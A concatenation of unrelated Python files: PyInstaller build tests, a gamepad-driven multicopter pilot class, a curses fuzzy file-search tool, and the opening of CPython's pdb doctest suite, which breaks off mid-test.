import sysconfig
unfrozen_keys = sorted(sysconfig.get_config_vars().keys())
pyi_builder.test_source(
"""
# The error is raised immediately on import.
{}import sysconfig
# But just in case, Python later opt for some lazy loading, force
# configuration retrieval:
from pprint import pprint
pprint(sysconfig.get_config_vars())
unfrozen_keys = {}
assert sorted(sysconfig.get_config_vars()) == unfrozen_keys
""".format(distutils, unfrozen_keys)
)
def test_set_icon(pyi_builder, data_dir):
if is_win:
args = ['--icon', os.path.join(data_dir.strpath, 'pyi_icon.ico')]
elif is_darwin:
# On OS X icon is applied only for windowed mode.
args = ['--windowed', '--icon', os.path.join(data_dir.strpath, 'pyi_icon.icns')]
else:
pytest.skip('option --icon works only on Windows and Mac OS X')
pyi_builder.test_source("print('Hello Python!')", pyi_args=args)
@pytest.mark.win32
def test_invalid_icon(tmpdir, data_dir):
"""
Ensure a sane error message is given if the user provides a PNG or other unsupported format of image.
"""
from PyInstaller import PLATFORM, HOMEPATH
from PyInstaller.utils.win32.icon import CopyIcons
icon = os.path.join(data_dir.strpath, 'pyi_icon.png')
bootloader_src = os.path.join(HOMEPATH, 'PyInstaller', 'bootloader', PLATFORM, "run.exe")
exe = os.path.join(tmpdir, "run.exe")
shutil.copy(bootloader_src, exe)
assert os.path.isfile(icon)
assert os.path.isfile(exe)
with pytest.raises(
ValueError, match="path '.*pyi_icon.png' .* not in the correct format.*convert your '.png' file to a '.ico' .*"
):
CopyIcons(exe, icon)
def test_python_home(pyi_builder):
pyi_builder.test_script('pyi_python_home.py')
def test_stderr_encoding(tmpdir, pyi_builder):
# NOTE: '-s' option to pytest disables output capturing, changing this test's result:
# without -s: py.test process changes its own stdout encoding to 'UTF-8' to capture output. subprocess spawned by
# py.test has stdout encoding 'cp1252', which is an ANSI codepage. test fails as they do not match.
# with -s: py.test process has stdout encoding from windows terminal, which is an OEM codepage. spawned
# subprocess has the same encoding. test passes.
with open(os.path.join(tmpdir.strpath, 'stderr_encoding.build'), 'w') as f:
if sys.stderr.isatty():
enc = str(sys.stderr.encoding)
else:
# For non-interactive stderr use locale encoding - ANSI codepage.
# This fixes the test when running with py.test and capturing output.
enc = locale.getpreferredencoding(False)
f.write(enc)
pyi_builder.test_script('pyi_stderr_encoding.py')
def test_stdout_encoding(tmpdir, pyi_builder):
with open(os.path.join(tmpdir.strpath, 'stdout_encoding.build'), 'w') as f:
if sys.stdout.isatty():
enc = str(sys.stdout.encoding)
else:
# For non-interactive stderr use locale encoding - ANSI codepage.
# This fixes the test when running with py.test and capturing output.
enc = locale.getpreferredencoding(False)
f.write(enc)
pyi_builder.test_script('pyi_stdout_encoding.py')
def test_site_module_disabled(pyi_builder):
pyi_builder.test_script('pyi_site_module_disabled.py')
def test_time_module(pyi_builder):
pyi_builder.test_source("""
import time
print(time.strptime(time.ctime()))
""")
@pytest.mark.darwin
@pytest.mark.linux
def test_time_module_localized(pyi_builder, monkeypatch):
# This checks that functions 'time.ctime()' and 'time.strptime()' use the same locale. There was an issue with
# bootloader where every function was using different locale:
# time.ctime was using 'C'
# time.strptime was using 'xx_YY' from the environment.
monkeypatch.setenv('LC_ALL', 'cs_CZ.UTF-8')
pyi_builder.test_source("""
import time
print(time.strptime(time.ctime()))
""")
def test_xmldom_module(pyi_builder):
pyi_builder.test_source(
"""
print('Importing xml.dom')
from xml.dom import pulldom
print('Importing done')
"""
)
def test_threading_module(pyi_builder):
pyi_builder.test_source(
"""
import threading
import sys
print('See stderr for messages')
def print_(*args): print(*args, file=sys.stderr)
def doit(nm):
print_(nm, 'started')
import pyi_testmod_threading
try:
print_(nm, pyi_testmod_threading.x)
finally:
print_(nm, pyi_testmod_threading)
t1 = threading.Thread(target=doit, args=('t1',))
t2 = threading.Thread(target=doit, args=('t2',))
t1.start()
t2.start()
doit('main')
t1.join() ; print_('t1 joined')
t2.join() ; print_('t2 joined')
print_('finished.')
"""
)
def test_threading_module2(pyi_builder):
pyi_builder.test_script('pyi_threading_module2.py')
def test_argument(pyi_builder):
pyi_builder.test_source(
"""
import sys
assert sys.argv[1] == "--argument", "sys.argv[1] was %r, expected %r" % (sys.argv[1], "--argument")
""",
app_args=["--argument"]
)
@importorskip('win32com')
def test_pywin32_win32com(pyi_builder):
pyi_builder.test_source(
"""
# Test importing some modules from pywin32 package.
# All modules from pywin32 depens on module pywintypes.
# This module should be also included.
import win32com
import win32com.client
import win32com.server
"""
)
#@pytest.mark.xfail(reason="Requires post-create-package hooks (issue #1322)")
@importorskip('win32com')
def test_pywin32_comext(pyi_builder):
pyi_builder.test_source(
"""
# Test importing modules from win32com that are actually present in
# win32comext, and made available by __path__ changes in win32com.
from win32com.shell import shell
from win32com.propsys import propsys
from win32com.bits import bits
"""
)
@importorskip('win32ui')
@xfail(reason="https://github.com/mhammond/pywin32/issues/1614")
def test_pywin32_win32ui(pyi_builder):
pyi_builder.test_source(
"""
# Test importing some modules from pywin32 package.
# All modules from pywin32 depens on module pywintypes.
# This module should be also included.
import win32ui
from pywin.mfc.dialog import Dialog
d = Dialog(win32ui.IDD_SIMPLE_INPUT)
"""
)
@pytest.mark.win32
def test_renamed_exe(pyi_builder):
_old_find_executables = pyi_builder._find_executables
def _find_executables(name):
oldexes = _old_find_executables(name)
newexes = []
for old in oldexes:
new = os.path.join(os.path.dirname(old), "renamed_" + os.path.basename(old))
os.rename(old, new)
newexes.append(new)
return newexes
pyi_builder._find_executables = _find_executables
pyi_builder.test_source("print('Hello Python!')")
def test_spec_with_utf8(pyi_builder_spec):
pyi_builder_spec.test_spec('spec-with-utf8.spec')
@pytest.mark.darwin
def test_osx_override_info_plist(pyi_builder_spec):
pyi_builder_spec.test_spec('pyi_osx_override_info_plist.spec')
def test_hook_collect_submodules(pyi_builder, script_dir):
# This is designed to test the operation of PyInstaller.utils.hook.collect_submodules. To do so:
#
# 1. It imports the dummy module pyi_collect_submodules_mod, which contains nothing.
# 2. This causes hook-pyi_collect_submodules_mod.py to be run, which collects some dummy submodules. In this case,
# it collects from modules/pyi_testmod_relimp.
# 3. Therefore, we should be able to find hidden imports under pyi_testmod_relimp.
pyi_builder.test_source(
"""
import pyi_collect_submodules_mod
__import__('pyi_testmod_relimp.B.C')
""", ['--additional-hooks-dir=%s' % script_dir.join('pyi_hooks')]
)
# Test that PyInstaller can handle a script with an arbitrary extension.
def test_arbitrary_ext(pyi_builder):
pyi_builder.test_script('pyi_arbitrary_ext.foo')
def test_option_runtime_tmpdir(pyi_builder):
"""
Test to ensure that option `runtime_tmpdir` can be set and has effect.
"""
pyi_builder.test_source(
"""
print('test - runtime_tmpdir - custom runtime temporary directory')
import os
import sys
cwd = os.path.abspath(os.getcwd())
runtime_tmpdir = os.path.abspath(sys._MEIPASS)
# for onedir mode, runtime_tmpdir == cwd
# for onefile mode, os.path.dirname(runtime_tmpdir) == cwd
if not runtime_tmpdir == cwd and not os.path.dirname(runtime_tmpdir) == cwd:
raise SystemExit('Expected sys._MEIPASS to be under current working dir.'
' sys._MEIPASS = ' + runtime_tmpdir + ', cwd = ' + cwd)
print('test - done')
""", ['--runtime-tmpdir=.']
) # set runtime-tmpdir to current working dir
@xfail(reason='Issue #3037 - all scripts share the same global vars')
def test_several_scripts1(pyi_builder_spec):
"""
Verify each script has it's own global vars (original case, see issue #2949).
"""
pyi_builder_spec.test_spec('several-scripts1.spec')
@xfail(reason='Issue #3037 - all scripts share the same global vars')
def test_several_scripts2(pyi_builder_spec):
"""
Verify each script has it's own global vars (basic test).
"""
pyi_builder_spec.test_spec('several-scripts2.spec')
@pytest.mark.win32
def test_pe_checksum(pyi_builder):
import ctypes
from ctypes import wintypes
pyi_builder.test_source("print('hello')")
exes = pyi_builder._find_executables('test_source')
assert exes
for exe in exes:
# Validate the PE checksum using the official Windows API for doing so.
# https://docs.microsoft.com/en-us/windows/win32/api/imagehlp/nf-imagehlp-mapfileandchecksumw
header_sum = wintypes.DWORD()
checksum = wintypes.DWORD()
assert ctypes.windll.imagehlp.MapFileAndCheckSumW(
ctypes.c_wchar_p(exe), ctypes.byref(header_sum), ctypes.byref(checksum)
) == 0
assert header_sum.value == checksum.value
def test_onefile_longpath(pyi_builder, tmpdir):
"""
Verify that files with paths longer than 260 characters are correctly extracted from the onefile build.
See issue #5615."
"""
# The test is relevant only for onefile builds
if pyi_builder._mode != 'onefile':
pytest.skip('The test is relevant only to onefile builds.')
# Create data file with secret
_SECRET = 'LongDataPath'
src_filename = tmpdir / 'data.txt'
with open(src_filename, 'w') as fp:
fp.write(_SECRET)
# Generate long target filename/path; eight equivalents of SHA256 strings plus data.txt should push just the
# _MEIPASS-relative path beyond 260 characters...
dst_filename = os.path.join(*[32 * chr(c) for c in range(ord('A'), ord('A') + 8)], 'data.txt')
assert len(dst_filename) >= 260
# Name for --add-data
if is_win:
add_data_name = src_filename + ';' + os.path.dirname(dst_filename)
else:
add_data_name = src_filename + ':' + os.path.dirname(dst_filename)
pyi_builder.test_source(
"""
import sys
import os
data_file = os.path.join(sys._MEIPASS, r'{data_file}')
print("Reading secret from %r" % (data_file))
with open(data_file, 'r') as fp:
secret = fp.read()
assert secret == r'{secret}'
""".format(data_file=dst_filename, secret=_SECRET), ['--add-data', str(add_data_name)]
)
@pytest.mark.win32
@pytest.mark.parametrize("icon", ["icon_default", "icon_none", "icon_given"])
def test_onefile_has_manifest(pyi_builder, icon):
"""
Verify that onefile builds on Windows end up having manifest embedded. See issue #5624.
"""
from PyInstaller.utils.win32 import winmanifest
from PyInstaller import PACKAGEPATH
# The test is relevant only for onefile builds
if pyi_builder._mode != 'onefile':
pytest.skip('The test is relevant only to onefile builds.')
# Icon type
if icon == 'icon_default':
# Default; no --icon argument
extra_args = []
elif icon == 'icon_none':
# Disable icon completely; --icon NONE
extra_args = ['--icon', 'NONE']
elif icon == 'icon_given':
# Locate pyinstaller's default icon, and explicitly give it
# via --icon argument
icon_path = os.path.join(PACKAGEPATH, 'bootloader', 'images', 'icon-console.ico')
extra_args = ['--icon', icon_path]
# Build the executable...
pyi_builder.test_source("""print('Hello world!')""", extra_args)
# ... and ensure that it contains manifest
exes = pyi_builder._find_executables('test_source')
assert exes
for exe in exes:
res = winmanifest.GetManifestResources(exe)
assert res, "No manifest resources found!"
@pytest.mark.parametrize("append_pkg", [True, False], ids=["embedded", "sideload"])
def test_sys_executable(pyi_builder, append_pkg, monkeypatch):
"""
Verify that sys.executable points to the executable, regardless of build mode (onedir vs. onefile) and the
append_pkg setting (embedded vs. side-loaded CArchive PKG).
"""
# Set append_pkg; taken from test_pyz_as_external_file
import PyInstaller.building.build_main
EXE = PyInstaller.building.build_main.EXE
def MyEXE(*args, **kwargs):
kwargs['append_pkg'] = append_pkg
return EXE(*args, **kwargs)
monkeypatch.setattr('PyInstaller.building.build_main.EXE', MyEXE)
# Expected executable basename
exe_basename = 'test_source'
if is_win:
exe_basename += '.exe'
pyi_builder.test_source(
"""
import sys
import os
exe_basename = os.path.basename(sys.executable)
assert exe_basename == '{}', "Unexpected basename(sys.executable): " + exe_basename
""".format(exe_basename)
)
@pytest.mark.win32
def test_subprocess_in_windowed_mode(pyi_windowed_builder):
"""Test invoking subprocesses from a PyInstaller app built in windowed mode."""
pyi_windowed_builder.test_source(
r"""
from subprocess import PIPE, run
from unittest import TestCase
# Lazily use unittest's rich assertEqual() for assertions with builtin diagnostics.
assert_equal = TestCase().assertEqual
run([{0}, "-c", ""], check=True)
# Verify that stdin, stdout and stderr still work and haven't been muddled.
p = run([{0}, "-c", "print('foo')"], stdout=PIPE, universal_newlines=True)
assert_equal(p.stdout, "foo\n", p.stdout)
p = run([{0}, "-c", r"import sys; sys.stderr.write('bar\n')"], stderr=PIPE, universal_newlines=True)
assert_equal(p.stderr, "bar\n", p.stderr)
p = run([{0}], input="print('foo')\nprint('bar')\n", stdout=PIPE, universal_newlines=True)
assert_equal(p.stdout, "foo\nbar\n", p.stdout)
""".format(repr(sys.executable)),
pyi_args=["--windowed"]
)
|
pilot.py
|
"""
To install X-Box gamepad software on Ubuntu 14.04:
sudo apt-get install dkms
sudo git clone https://github.com/paroj/xpad.git /usr/src/xpad-0.4
sudo dkms install -m xpad -v 0.4
sudo modprobe xpad (might need to turn off "secure boot" in BIOS)
reboot computer and then plug in an Xbox 360/One gamepad via USB
press the big X button, light should glow solid (not flashing)
"""
from __future__ import division
import numpy as np; npl = np.linalg
from threading import Thread
from collections import deque # thread safe
from inputs import devices, get_gamepad
from motion import Command
class Pilot(object):
"""
User interface for remote-controlling a multicopter.
Call start_pilot_thread to begin filling an internal buffer with user input.
Call get_command to execute / clear the buffer and get the current relevant Command object.
Change the mission_code attribute to an integer that will be sent as command.start on activation.
Call stop_pilot_thread when done!
max_roll: magnitude of the largest acceptable roll command (in degrees)
max_pitch: magnitude of the largest acceptable pitch command (in degrees)
max_yaw_rate: magnitude of the largest acceptable yaw rate command (in degrees per time)
max_ascent_rate: magnitude of the largest acceptable ascent rate command
stick_deadband: fraction of analog joystick travel that should be treated as zero
trigger_deadband: fraction of analog trigger travel that should be treated as zero
max_buffer_size: maximum number of user commands that should be stored before dropping old ones
button_callbacks: dictionary of callback functions keyed by button names (A, B, X, Y, L, R, SL, SR, DV, DH, K)
"""
def __init__(self, max_roll=65, max_pitch=65, max_yaw_rate=180, max_ascent_rate=5,
stick_deadband=0.1, trigger_deadband=0.0, max_buffer_size=200, button_callbacks={}):
self.max_roll = np.deg2rad(max_roll)
self.max_pitch = np.deg2rad(max_pitch)
self.max_yaw_rate = np.deg2rad(max_yaw_rate)
self.max_ascent_rate = np.float64(max_ascent_rate)
self.stick_deadband = float(stick_deadband)
self.trigger_deadband = float(trigger_deadband)
self.max_buffer_size = int(max_buffer_size)
self.button_callbacks = button_callbacks
# Valid input device names in priority order
self.valid_device_names = ["Microsoft X-Box One pad (Firmware 2015)",
"PowerA Xbox One wired controller"]
# Set valid input device
self.input_device = None
for valid_device_name in self.valid_device_names:
if self.input_device is not None: break
for device in devices:
if device.name == valid_device_name:
self.input_device = device.name
print "Hello, Pilot! Ready to read from {}.".format(device.name)
break
if self.input_device is None: raise IOError("FATAL: No valid input device is connected!")
# Digital button code names
self.button_codes = {"BTN_SOUTH": "A", "BTN_EAST": "B", "BTN_NORTH": "X", "BTN_WEST": "Y",
"BTN_TL": "L", "BTN_TR": "R", "BTN_SELECT": "SL", "BTN_START": "SR",
"ABS_HAT0Y": "DV", "ABS_HAT0X": "DH", "BTN_MODE": "K"}
# Analog input characteristics
self.max_stick = 32767
self.max_trigger = 1023
self.min_stick = int(self.stick_deadband * self.max_stick)
self.min_trigger = int(self.trigger_deadband * self.max_trigger)
# Internals
self.command = None
self.pilot_thread = None
self.stay_alive = False
self.buffer = deque([])
self.buffer_size_flag = False
# Change this integer attribute to affect what command.start will be when activated
self.mission_code = 0
def get_command(self):
"""
Executes / clears the input buffer and returns the current relevant Command object.
"""
if self.pilot_thread is None: raise AssertionError("FATAL: Cannot get_command without active pilot thread!")
while self.buffer:
event = self.buffer.pop()
if event.code == "ABS_Y": self.command.ascent_rate = -self._stick_frac(event.state) * self.max_ascent_rate
elif event.code == "ABS_X": pass
elif event.code == "ABS_RY": self.command.pitch = -self._stick_frac(event.state) * self.max_pitch
elif event.code == "ABS_RX": self.command.roll = self._stick_frac(event.state) * self.max_roll
elif event.code == "ABS_Z": self.command.yaw_rate = self._trigger_frac(event.state) * self.max_yaw_rate
elif event.code == "ABS_RZ": self.command.yaw_rate = -self._trigger_frac(event.state) * self.max_yaw_rate
elif event.code in self.button_codes:
if event.code == "BTN_WEST": self.command.start = int(event.state * self.mission_code)
elif event.code == "BTN_NORTH": self.command.cancel = bool(event.state)
elif event.code == "BTN_MODE": self.command.kill = bool(event.state)
self.button_callbacks.get(self.button_codes[event.code], lambda val: None)(event.state)
return self.command
def start_pilot_thread(self):
"""
Starts a thread that reads user input into the internal buffer.
"""
if self.stay_alive:
print "----------"
print "WARNING: Pilot thread already running!"
print "Cannot start another."
print "----------"
return
self.command = Command()
self.stay_alive = True
if self.input_device in ["Microsoft X-Box One pad (Firmware 2015)",
"PowerA Xbox One wired controller"]:
self.pilot_thread = Thread(target=self._listen_xbox)
else:
raise IOError("FATAL: No listener function has been implemented for device {}.".format(self.input_device))
print "Pilot thread has begun!"
self.pilot_thread.start()
def stop_pilot_thread(self):
"""
Terminates the Pilot's user input reading thread and clears the buffer.
"""
self.stay_alive = False
if self.pilot_thread is not None:
print "Pilot thread terminating on next input!"
self.pilot_thread.join() # stay secure
self.pilot_thread = None
while self.buffer:
self.buffer.pop()
self.buffer_size_flag = False
self.command = None
def _listen_xbox(self):
try:
while self.stay_alive:
self.buffer.appendleft(get_gamepad()[0]) # this is blocking (hence need for threading)
if len(self.buffer) > self.max_buffer_size:
if not self.buffer_size_flag:
self.buffer_size_flag = True
print "----------"
print "WARNING: Pilot input buffer reached {} entries.".format(self.max_buffer_size)
print "Dropping old commands."
print "----------"
self.buffer.pop()
finally:
print "Pilot thread terminated!"
self.pilot_thread = None
def _stick_frac(self, val):
if abs(val) > self.min_stick:
return np.divide(val, self.max_stick, dtype=np.float64)
return np.float64(0)
def _trigger_frac(self, val):
if abs(val) > self.min_trigger:
return np.divide(val, self.max_trigger, dtype=np.float64)
return np.float64(0)
|
main.py
|
import curses
from curses import wrapper
import sys
from timeit import default_timer
import multiprocessing
from trie import main as trie
import fuzzy
from LRUcache import LRUCache
"""
NOTE: All coordinates are in the format (y, x) because that's how curses works)
"""
manager = multiprocessing.Manager()
mutex = manager.Lock()
INVALIDS = [
10,
263,
262,
360,
331,
339,
330,
338,
258,
259,
260,
261,
410,
343,
575,
580,
579,
577
]
INVALIDS += range(265, 275)
def validate_key(c: int):
decoded = curses.keyname(c).decode('utf-8')
if (c in INVALIDS or decoded.startswith('^') and not decoded.startswith('^[')):
return False
else:
return True
cache = LRUCache(40)
def index_letters(q):
with open('log.txt', 'a') as log:
log.write("index thread\n")
try:
path = sys.argv[1]
except IndexError:
path = None
file_list = trie(path)
to_put = []
for i in range(ord('a'), ord('z')+1):
full_string = chr(i)
matches = []
for file in file_list:
file_name = file.split('/')[-1]
if ('.' in file_name):
out = fuzzy.fuzzy_match(full_string, file_name)
if out[0]:
full_path = "/".join(file.split('/')[-3:-1])
if len(full_path) > 45:
full_path = "..." + full_path[-42:]
matches.append((out[1], file_name, full_path))
matches.sort(key=lambda x: x[0], reverse=True)
mutex.acquire()
to_put.append((full_string, matches))
mutex.release()
q.put(to_put)
def main(s):
'''
* s is the whole screen as an object
* Main function wrapped by wrapper so that terminal doesn't get messed up
* by accident
'''
with open('log.txt', 'a') as log:
log.write("Curses thread\n")
# Accept path as command line argument
try:
path = sys.argv[1]
except IndexError:
path = None
# Define colors
curses.init_pair(2, curses.COLOR_CYAN, curses.COLOR_BLACK)
# curses.init_pair(2, curses.COLOR_BLUE, curses.COLOR_BLACK)
curses.init_pair(3, curses.COLOR_YELLOW, curses.COLOR_BLACK)
# curses.init_pair(4, curses.COLOR_GREEN, curses.COLOR_BLACK)
curses.init_pair(4, curses.COLOR_MAGENTA, curses.COLOR_BLACK)
curses.init_pair(5, curses.COLOR_MAGENTA, curses.COLOR_BLACK)
# Make the trie
# trie.main returns list of all possible paths
file_list = trie(path)
sh, sw = s.getmaxyx() # Get the height, and width of the terminal
s.clear() # Clear the terminal
curses.raw() # Get raw input from the keyboard
curses.echo() # Echo the input keys to the screen
curses.nl() # Set enter to correspond to new line
# Create a title box with height 2 rows and width 100%, starting at 1, 0
title_box = s.subwin(2, sw-7, 1, 3)
title_box.addstr('Directory searching using Trie, fuzzysearch and DFS', curses.color_pair(2))
# title_box.chgat(-1, curses.A_REVERSE) # That sweet background on the title
title_box.chgat(-1, curses.color_pair(5)) # That sweet background on the title
title_box.hline(1, 0, '-', sw-7)
# Create a search box of height 2 rows, width 100 at 3, 0
search_box = s.subwin(2, sw, 3, 0)
search_box.addstr(' Search: ', curses.color_pair(4))
search_box.hline(1, 3, '-', sw-7)
# The output box that covers the rest of the screen
output_box = s.subwin(sh-5, sw-3, 5, 3)
output_box.addstr('Results:\nTo find, you must seek!')
# Instructions the bottom of the screen
s.addstr(sh-1, 3, 'Start typing to search! Press <ESC> to exit.', curses.color_pair(3))
input_x = 11 # The x coordinate of the cursor
full_string = "" # full_string is the search query
# Store the output here, edit line 86 to format things appropriately
new_file_list = file_list
BACKSPACES = [127, 263]
# Main loop
while 1:
# Get a character from the keyboard
c = s.getch(3, input_x)
if (c == 27):
# Quit if <ESC> is pressed
curses.endwin()
return
elif c in BACKSPACES:
# Check if backspace
new_file_list = file_list
s.addch(3, input_x, " ")
s.addch(3, input_x+1, " ")
s.addch(3, input_x+2, " ")
if (not input_x == 11):
# Check if not empty string
input_x -= 1 # Decrement cursors x-coordinate
full_string = full_string[:-1] # Remove last char of search query
s.delch(3, input_x) # Remove the character from the screen
output_box.clear() # Clear the output box
else:
continue
elif not validate_key(c):
continue
elif not chr(c) == "\n":
# Add the chr to the search query and increment cursor position
full_string += chr(c)
input_x += 1
matches = []
time_taken = ""
# Performing fuzzy search on each file in file system (reducing number of files searched on each query)
start_time = default_timer()
matches = cache.get(full_string)
if matches is None:
matches = []
for file in new_file_list:
file_name = file.split('/')[-1]
if ('.' in file_name):
out = fuzzy.fuzzy_match(full_string, file_name)
if out[0]:
full_path = "/".join(file.split('/')[-3:-1])
if len(full_path) > 45:
full_path = "..." + full_path[-42:]
matches.append((out[1], file_name, full_path))
matches.sort(key=lambda x: x[0], reverse=True)
mutex.acquire()
cache.put(full_string, matches)
mutex.release()
end_time = default_timer()
if matches:
new_file_list = []
for match in matches:
full_file_path = match[2]+'/'+match[1]
new_file_list.append(full_file_path)
time_taken = f"{len(matches)} matches in {(end_time - start_time) * 1000} ms"
if (not (full_string == "" or matches == [])):
# Clear the output box and add the matches
output_box.clear()
if len(matches) > sh - 10:
temp_matches = matches[:sh-11]
else:
temp_matches = matches
for match in temp_matches:
output_box.addstr(f'{match[0]:>4} | ')
output_box.addstr(f'.../{match[2]:<45}', curses.color_pair(2))
output_box.addstr(f' | {match[1]}\n')
elif (full_string == ""):
# Message if there is no input
output_box.clear()
output_box.addstr('To find, you must seek!')
else:
# Message if there are no matches
output_box.clear()
output_box.addstr('What you seek for lies beyond the realms of possibility!')
# refreesh all boxes
search_box.refresh()
output_box.refresh()
s.refresh()
# since everything cleared, the message at bottom needs to be written
s.addstr(sh-2, 3, time_taken, curses.color_pair(2))
s.addstr(sh-1, 3, 'Start typing to search! Press <ESC> to exit.', curses.color_pair(3))
if __name__ == "__main__":
q = multiprocessing.Queue()
indexer = multiprocessing.Process(target=index_letters, args=(q,))
main_loop = multiprocessing.Process(target=wrapper, args=(main,))
indexer.start()
vals = q.get()
for val in vals:
cache.put(val[0], val[1])
main_loop.start()
indexer.join()
main_loop.join()
|
test_pdb.py
|
# A test suite for pdb; not very comprehensive at the moment.
import doctest
import os
import pdb
import sys
import types
import codecs
import unittest
import subprocess
import textwrap
import linecache
from contextlib import ExitStack
from io import StringIO
from test.support import os_helper
# This little helper class is essential for testing pdb under doctest.
from test.test_doctest import _FakeInput
from unittest.mock import patch
class PdbTestInput(object):
"""Context manager that makes testing Pdb in doctests easier."""
def __init__(self, input):
self.input = input
def __enter__(self):
self.real_stdin = sys.stdin
sys.stdin = _FakeInput(self.input)
self.orig_trace = sys.gettrace() if hasattr(sys, 'gettrace') else None
def __exit__(self, *exc):
sys.stdin = self.real_stdin
if self.orig_trace:
sys.settrace(self.orig_trace)
def test_pdb_displayhook():
"""This tests the custom displayhook for pdb.
>>> def test_function(foo, bar):
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... pass
>>> with PdbTestInput([
... 'foo',
... 'bar',
... 'for i in range(5): print(i)',
... 'continue',
... ]):
... test_function(1, None)
> <doctest test.test_pdb.test_pdb_displayhook[0]>(3)test_function()
-> pass
(Pdb) foo
1
(Pdb) bar
(Pdb) for i in range(5): print(i)
0
1
2
3
4
(Pdb) continue
"""
def test_pdb_basic_commands():
"""Test the basic commands of pdb.
>>> def test_function_2(foo, bar='default'):
... print(foo)
... for i in range(5):
... print(i)
... print(bar)
... for i in range(10):
... never_executed
... print('after for')
... print('...')
... return foo.upper()
>>> def test_function3(arg=None, *, kwonly=None):
... pass
>>> def test_function4(a, b, c, /):
... pass
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... ret = test_function_2('baz')
... test_function3(kwonly=True)
... test_function4(1, 2, 3)
... print(ret)
>>> with PdbTestInput([ # doctest: +ELLIPSIS, +NORMALIZE_WHITESPACE
... 'step', # entering the function call
... 'args', # display function args
... 'list', # list function source
... 'bt', # display backtrace
... 'up', # step up to test_function()
... 'down', # step down to test_function_2() again
... 'next', # stepping to print(foo)
... 'next', # stepping to the for loop
... 'step', # stepping into the for loop
... 'until', # continuing until out of the for loop
... 'next', # executing the print(bar)
... 'jump 8', # jump over second for loop
... 'return', # return out of function
... 'retval', # display return value
... 'next', # step to test_function3()
... 'step', # stepping into test_function3()
... 'args', # display function args
... 'return', # return out of function
... 'next', # step to test_function4()
... 'step', # stepping to test_function4()
... 'args', # display function args
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) args
foo = 'baz'
bar = 'default'
(Pdb) list
1 -> def test_function_2(foo, bar='default'):
2 print(foo)
3 for i in range(5):
4 print(i)
5 print(bar)
6 for i in range(10):
7 never_executed
8 print('after for')
9 print('...')
10 return foo.upper()
[EOF]
(Pdb) bt
...
<doctest test.test_pdb.test_pdb_basic_commands[4]>(25)<module>()
-> test_function()
<doctest test.test_pdb.test_pdb_basic_commands[3]>(3)test_function()
-> ret = test_function_2('baz')
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) up
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(3)test_function()
-> ret = test_function_2('baz')
(Pdb) down
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(1)test_function_2()
-> def test_function_2(foo, bar='default'):
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(2)test_function_2()
-> print(foo)
(Pdb) next
baz
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(3)test_function_2()
-> for i in range(5):
(Pdb) step
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(4)test_function_2()
-> print(i)
(Pdb) until
0
1
2
3
4
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(5)test_function_2()
-> print(bar)
(Pdb) next
default
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(6)test_function_2()
-> for i in range(10):
(Pdb) jump 8
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(8)test_function_2()
-> print('after for')
(Pdb) return
after for
...
--Return--
> <doctest test.test_pdb.test_pdb_basic_commands[0]>(10)test_function_2()->'BAZ'
-> return foo.upper()
(Pdb) retval
'BAZ'
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(4)test_function()
-> test_function3(kwonly=True)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[1]>(1)test_function3()
-> def test_function3(arg=None, *, kwonly=None):
(Pdb) args
arg = None
kwonly = True
(Pdb) return
--Return--
> <doctest test.test_pdb.test_pdb_basic_commands[1]>(2)test_function3()->None
-> pass
(Pdb) next
> <doctest test.test_pdb.test_pdb_basic_commands[3]>(5)test_function()
-> test_function4(1, 2, 3)
(Pdb) step
--Call--
> <doctest test.test_pdb.test_pdb_basic_commands[2]>(1)test_function4()
-> def test_function4(a, b, c, /):
(Pdb) args
a = 1
b = 2
c = 3
(Pdb) continue
BAZ
"""
def reset_Breakpoint():
import bdb
bdb.Breakpoint.clearBreakpoints()
def test_pdb_breakpoint_commands():
"""Test basic commands related to breakpoints.
>>> def test_function():
... import pdb; pdb.Pdb(nosigint=True, readrc=False).set_trace()
... print(1)
... print(2)
... print(3)
... print(4)
First, need to clear bdb state that might be left over from previous tests.
Otherwise, the new breakpoints might get assigned different numbers.
>>> reset_Breakpoint()
Now test the breakpoint commands. NORMALIZE_WHITESPACE is needed because
the breakpoint list outputs a tab for the "stop only" and "ignore next"
lines, which we don't want to put in here.
>>> with PdbTestInput([ # doctest: +NORMALIZE_WHITESPACE
... 'break 3',
... 'disable 1',
... 'ignore 1 10',
... 'condition 1 1 < 2',
... 'break 4',
... 'break 4',
... 'break',
... 'clear 3',
... 'break',
... 'condition 1',
... 'enable 1',
... 'clear 1',
... 'commands 2',
... 'p "42"',
... 'print("42", 7*6)', # Issue 18764 (not about breakpoints)
... 'end',
... 'continue', # will stop at breakpoint 2 (line 4)
... 'clear', # clear all!
... 'y',
... 'tbreak 5',
... 'continue', # will stop at temporary breakpoint
... 'break', # make sure breakpoint is gone
... 'continue',
... ]):
... test_function()
> <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>(3)test_function()
-> print(1)
(Pdb) break 3
Breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) disable 1
Disabled breakpoint 1 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:3
(Pdb) ignore 1 10
Will ignore next 10 crossings of breakpoint 1.
(Pdb) condition 1 1 < 2
New condition set for breakpoint 1.
(Pdb) break 4
Breakpoint 2 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break 4
Breakpoint 3 at <doctest test.test_pdb.test_pdb_breakpoint_commands[0]>:4
(Pdb) break
Num Type Disp Enb Where
